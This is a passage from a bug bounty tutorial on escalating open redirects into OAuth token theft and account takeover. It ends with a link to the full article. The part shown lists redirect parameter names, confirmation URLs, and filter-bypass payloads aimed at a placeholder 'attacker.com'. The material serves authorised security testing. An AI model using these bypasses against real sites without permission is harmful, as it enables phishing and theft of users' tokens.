📰 Originally published on SecurityElites — the canonical, fully-updated version of this article.

⚠️ Authorised Testing Only: All techniques covered here target authorised bug bounty programmes or systems you have explicit written permission to test. Exploiting OAuth token theft or account takeover chains against real users without authorisation is illegal under computer fraud legislation worldwide. SecurityElites.com accepts no liability for misuse.

Most bug bounty hunters file open redirects as Low severity and move on. The programme triage team accepts it, pays the minimum bounty, and closes the ticket. That is the correct call for a standalone redirect — sending a user to an arbitrary URL is a phishing aid, not an account takeover. But on a programme last year I found an open redirect on a target that also used OAuth for social login. I spent twenty minutes testing a chain. The redirect_uri in the OAuth flow accepted the target’s own domain. The open redirect endpoint was on that domain. I crafted a link that sent any authenticated user’s access token directly to my server. The programme rated it Critical. It paid $15,000. The original open redirect finding, filed standalone, would have paid $150.

The open redirect to account takeover chain is one of the most consistent severity-escalation paths in web application security. It is under-hunted because most hunters stop at the redirect confirmation. I cover the full chain here: OAuth token theft via redirect_uri manipulation, phishing bypass using on-domain redirects, and SSRF escalation via server-side redirect following. The difference between a Low finding and a Critical one is twenty minutes of methodical chaining. ### 🎯 What You’ll Master Confirm open redirects and enumerate chain potential before filing Chain open redirect to OAuth token theft — complete redirect_uri manipulation methodology Build a working account takeover proof of concept using Burp Collaborator Bypass open redirect protections — URL encoding, subdomain tricks, protocol-relative Chain open redirect into SSRF via server-side redirect following Write the High/Critical severity report that reflects the actual impact ⏱️ 60 min · 3 exercises · Browser + PortSwigger + Burp Suite ### ✅ Prerequisites - Day 11 — Open Redirect Bug Bounty — the baseline open redirect detection methodology this article escalates - Day 18 — OAuth Bug Bounty — OAuth flow fundamentals; understanding authorisation codes, implicit flow, and redirect_uri validation is required for the chain - Burp Suite installed — active proxy and Collaborator used in Exercises 2 and 3 ### 📋 Open Redirect to Account Takeover — Contents 1. Finding Open Redirects — Parameters, Patterns & Bypass Techniques 2. The OAuth Token Theft Chain — redirect_uri Manipulation 3. Phishing Bypass — Using On-Domain Redirects to Beat Filters 4. SSRF Chain — When the Server Follows Your Redirect 5. Building the Account Takeover PoC 6. Reporting — Severity Calculation and Evidence Package The open redirect fundamentals from Day 11 cover detection and basic confirmation. That foundation ends with a confirmed redirect — today extends it into the question of whether the redirect chains into something that pays at a different tier. The OAuth knowledge from Day 18 is the direct prerequisite for Section 2. Read both before working through the exercises if you have not already.

Finding Open Redirects — Parameters, Patterns & Bypass Techniques

Open redirects hide in predictable places. The post-login redirect parameter is the most common — after authentication, the application forwards the user to wherever they were trying to go, stored in a parameter. Logout flows redirect to a homepage or SSO portal. Email link tracking systems redirect from a tracking domain to the destination. OAuth redirect_uri parameters accept redirect destinations as part of the protocol. Every one of these is a candidate for testing.

OPEN REDIRECT — DISCOVERY PATTERNS AND CONFIRMATIONCopy

Common redirect parameter names to test

?url= ?redirect= ?return= ?next=
?continue= ?goto= ?destination= ?target=
?link= ?returnTo= ?redirectTo= ?forward=
?redir= ?callback= ?successUrl= ?failUrl=

Basic confirmation test

https://target.com/logout?redirect=https://attacker.com
https://target.com/login?next=https://attacker.com
https://target.com/sso?return=https://attacker.com
If browser navigates to attacker.com → open redirect confirmed

Bypass techniques for input validation

1. Protocol-relative URL (bypasses http/https check)

?redirect=//attacker.com

2. URL encoding

?redirect=https%3A%2F%2Fattacker.com
?redirect=%2F%2Fattacker.com

3. Subdomain bypass (if validation checks for “target.com” substring)

?redirect=https://target.com.attacker.com
?redirect=https://attacker.com?x=target.com

4. URL fragment bypass

?redirect=https://target.com#https://attacker.com

5. Double URL encoding

?redirect=https%253A%252F%252Fattacker.com

6. Unicode/homograph (Cyrillic ‘a’ in domain)

?redirect=https://аttacker.com (Cyrillic а ≠ Latin a)

Find with Burp: search proxy history for URLs in parameter values

Burp Target → Search → regex: (url|redirect|next|return|goto)=https?://

🛠️ EXERCISE 1 — BROWSER (15 MIN · AUTHORISED TARGETS)
Find and Confirm an Open Redirect on a Bug Bounty Target

⏱️ 15 minutes · Browser only · Authorised scope required

Before any chaining attempt, you need a confirmed open redirect. This exercise runs the discovery and confirmation workflow — the same sequence I run at the start of every redirect chaining assessment. Use an authorised bug bounty target or the PortSwigger open redirect labs.

---

📖 Read the complete guide on SecurityElites

This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites →

---

This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.